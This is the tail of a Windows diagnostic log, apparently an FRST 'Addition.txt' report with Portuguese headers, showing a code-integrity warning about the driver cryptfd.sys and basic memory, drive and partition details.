Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\cryptfd.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
==================== Informações da Memória ===========================
Processador: Intel(R) Pentium(R) CPU N3540 @ 2.16GHz
Percentagem de memória em uso: 54%
RAM física total: 3983.74 MB
RAM física disponível: 1793.23 MB
Virtual Total: 5391.74 MB
Virtual disponível: 2556.65 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:451.77 GB) (Free:266.21 GB) NTFS
==================== MBR & Tabela de Partições ==================
========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 26EA9241)
Partition: GPT.
==================== Fim de Addition.txt ============================